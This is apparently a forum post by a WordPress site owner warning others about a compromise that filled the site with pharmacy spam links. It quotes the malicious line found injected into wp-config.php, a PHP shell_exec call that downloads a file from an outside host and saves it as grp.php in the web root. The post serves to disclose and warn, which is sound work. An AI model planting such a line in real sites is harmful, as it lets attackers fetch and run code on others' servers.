I got a Google Alert today that shower a pharmacy link with my website. I went out and did a site search through Google and found spammy links and posts with pharmacy and drug type titles.
I started looking around, and immediately noticed this line at the top of my wp-config.php file:
<?php shell_exec('/usr/bin/GET http://boiledeggstudios.com/JJ/grp.txt > ./grp.php'); ?>
I also noticed a new file in my WordPress root directory called grp.php, which contains this (link to WordPress pastebin).
The links in the Google site search that are pharmacy links redirect off my site to a pharmacy of some kind.
I'm not sure where the vulnerability is. I'm current on my WordPress install (3.0). And I'm currently working to clean up the damage, and also check my other installs of WordPress.
I'm not looking for help cleaning up the site, I just wanted to inform everyone to be on the lookout.